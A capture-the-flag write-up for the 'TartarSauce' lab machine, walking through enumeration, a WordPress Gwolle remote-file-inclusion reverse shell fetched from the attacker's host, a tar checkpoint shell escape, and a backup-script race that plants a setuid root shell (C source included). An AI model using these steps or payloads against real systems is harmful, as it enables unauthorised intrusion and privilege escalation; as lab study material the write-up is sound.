TartarSauce
Enumeration
Nmap reveals only one open port:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-24 05:47 EDT
Nmap scan report for 10.10.10.88
Host is up (0.046s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page
Begin by poking at /webservices/monstra-3.0.4/.
Searchsploit shows that there is an authenticated RCE.
This blog post mentions that password hashes are exposed via http://sitename.com/storage/database/users.table.xml.
The passwords are salted, but many installations keep the default salt value:
/**
* Set password salt
*/
define('MONSTRA_PASSWORD_SALT', 'YOUR_SALT_HERE');
Trying to crack the password with hashcat and the default salt turned out to be a dead end.
Running gobuster against /webservices/ reveals a WordPress site at wp, which points to tartarsauce.htb.
Wpscan reveals that the site is using the plugin Gwolle.
Searchsploit shows there is a remote file inclusion (RFI) vulnerability in the plugin.
To get our foothold shell, we host a PHP reverse shell locally and access
10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.65:8000/
listening on [any] 1234 ...
connect to [10.10.16.65] from (UNKNOWN) [10.10.10.88] 54070
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 athlon i686 GNU/Linux
06:54:26 up 1:08, 0 users, load average: 0.01, 0.05, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
User
LinPEAS reveals the DB creds:
define('DB_NAME', 'wp');
define('DB_USER', 'wpuser');
define('DB_PASSWORD', 'w0rdpr3$$d@t@b@$3@cc3$$');
define('DB_HOST', 'localhost');
The creds give us access to the SQL DB.
$ mysql -u wpuser -p
w0rdpr3$$d@t@b@$3@cc3$$
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 92
Server version: 5.7.22-0ubuntu0.16.04.1 (Ubuntu)
> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| wp |
+--------------------+
2 rows in set (0.00 sec)
show tables;
+-----------------------+
| Tables_in_wp |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_gwolle_gb_entries |
| wp_gwolle_gb_log |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
14 rows in set (0.00 sec)
select * from wp_users;
+----+------------+------------------------------------+---------------+--------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+--------------------+----------+---------------------+---------------------+-------------+--------------+
| 1 | wpadmin | $P$BBU0yjydBz9THONExe2kPEsvtjStGe1 | wpadmin | wpadmin@test.local | | 2018-02-09 20:49:26 | | 0 | wpadmin |
+----+------------+------------------------------------+---------------+--------------------+----------+---------------------+---------------------+-------------+--------------+
1 row in set (0.00 sec)
Attempting to crack it with hashcat appears to be a dead end.
www-data can tar files as the user onuma:
sudo -l
Matching Defaults entries for www-data on TartarSauce:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on TartarSauce:
(onuma) NOPASSWD: /bin/tar
www-data@TartarSauce:/tmp$
GTFOBins shows that we can spawn an interactive shell via tar's checkpoint actions:
sudo -u onuma /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
/bin/tar: Removing leading `/' from member names
whoami
onuma
$
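The checkpoint trick works because GNU tar can execute an arbitrary command every time it reaches a checkpoint. A harmless local demonstration (the payload just drops a marker file instead of spawning a shell):

```shell
# GNU tar runs the --checkpoint-action command at each checkpoint;
# here the "payload" only creates a marker file under /tmp.
marker=$(mktemp -u /tmp/checkpoint_demo.XXXXXX)
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="touch $marker"
ls -l "$marker"   # the marker exists: our command ran as a checkpoint action
rm -f "$marker"
```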
Root
From the LinPEAS enumeration we know that a backup script is running, based on the output of onuma_backup_test.txt.
By running find / -type f -name "backuperer" 2>/dev/null
we find that it is located at /usr/sbin/backuperer.
#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
# formatting
printbdr()
{
for n in $(seq 72);
do /usr/bin/printf $"-";
done
}
bdr=$(printbdr)
# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check
# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30
# Test the backup integrity
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}
/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
integrity_chk >> $errormsg
exit 2
else
# Clean up and save archive to the bkpdir.
/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
/bin/rm -rf $check .*
exit 0
fi
Going through the script, we can see that it:
- Sets local vars:
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
- Runs every 5 minutes (checking the service details)
- Deletes hidden files in $tmpdir (/var/tmp) and the $check directory (/var/tmp/check)
- Compresses $basedir into $tmpfile as onuma: tar -zcvf $tmpfile $basedir &
- Sleeps 30 seconds to let the backup complete
- Makes the $check directory (/var/tmp/check)
- Extracts the contents of $tmpfile to $check
- Runs the integrity check: diff -r $basedir $check$basedir (/var/www/html vs /var/tmp/check/var/www/html)
Inspecting the integrity checks
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}
[...]
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
integrity_chk >> $errormsg
exit 2
else
# Clean up and save archive to the bkpdir.
/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
/bin/rm -rf $check .*
exit 0
fi
We see that it runs diff -r, which recursively compares any subdirectories found. If the diff produces output (the check fails), the script appends the differences to the error log and exits, leaving /var/tmp/check in place. If the directories match, it moves the archive to /var/backups and deletes the check directory. We want the check to fail, so that the extracted files stick around long enough for us to use them.
We need to create an archive which contains the path var/www/html, so that the diff command has a valid directory to compare; the diff will then find differences and return 1 (true).
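The branch condition can be confirmed locally: [[ $(integrity_chk) ]] is true exactly when diff produces output, i.e. when the two trees differ. A sketch using throwaway temp directories:

```shell
# Simulate backuperer's integrity check with two throwaway trees.
basedir=$(mktemp -d)
check=$(mktemp -d)
mkdir -p "$check$basedir"
echo original > "$basedir/index.html"
echo tampered > "$check$basedir/index.html"
# Same test backuperer uses: non-empty diff output means "check failed".
if [[ $(diff -r "$basedir" "$check$basedir") ]]; then
  echo "integrity check failed (differences found)"
fi
rm -rf "$basedir" "$check"
```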
On our own box, recreate the directory structure that check$basedir expects inside the archive:
mkdir -p var/www/html
We want to place a setuid binary inside, because tar preserves file ownership and permissions.
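That tar round-trips the setuid/setgid mode bits can be checked locally as an unprivileged user (all paths below are throwaway temp files):

```shell
# Verify that a tar round-trip preserves the setuid/setgid mode bits.
umask 022
workdir=$(mktemp -d)
cd "$workdir"
mkdir -p payload
touch payload/suid_file
chmod 6555 payload/suid_file
tar -zcf demo.tar.gz payload
mkdir extracted
tar -zxf demo.tar.gz -C extracted
stat -c '%a' extracted/payload/suid_file   # prints the mode; the 6xxx bits survive
cd / && rm -rf "$workdir"
```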
We can compile our own on our box:
#include <unistd.h>

int main(void)
{
    setreuid(0, 0);                      /* become root (works because the binary is setuid root) */
    char *argv[] = { "/bin/sh", NULL };  /* a proper argv, terminated by NULL */
    execve("/bin/sh", argv, NULL);
    return 1;                            /* only reached if execve fails */
}
Since the arch on that victim is 32 bit, we compile it to match.
gcc setuid.c -m32 -o setuid
Then we set the owner to root and add the setuid bit:
sudo chown root setuid
sudo chmod 6555 setuid
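Packaging the binary into the replacement archive can be sketched as follows (the touch is a stand-in for copying in the compiled, root-owned setuid binary):

```shell
# Build the replacement archive; member paths must start with var/www/html
# so the extracted tree lines up with $check$basedir on the target.
workdir=$(mktemp -d)
cd "$workdir"
mkdir -p var/www/html
touch var/www/html/setuid        # stand-in for the compiled setuid binary
tar -zcvf exploit.tar.gz var/www/html
tar -ztf exploit.tar.gz          # confirm the member paths
cd / && rm -rf "$workdir"
```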
We wait for the script to create the tar archive (it runs every 5 minutes); we can monitor this with systemctl list-timers.
Once the archive has been created, we have a 30-second window to replace it with our own, since root will then extract it.
Then the check directory will be created, and we can run our binary from it:
cd /var/tmp/check/var/www/html
./setuid
cd /root
ls
root.txt sys.sql wp.sql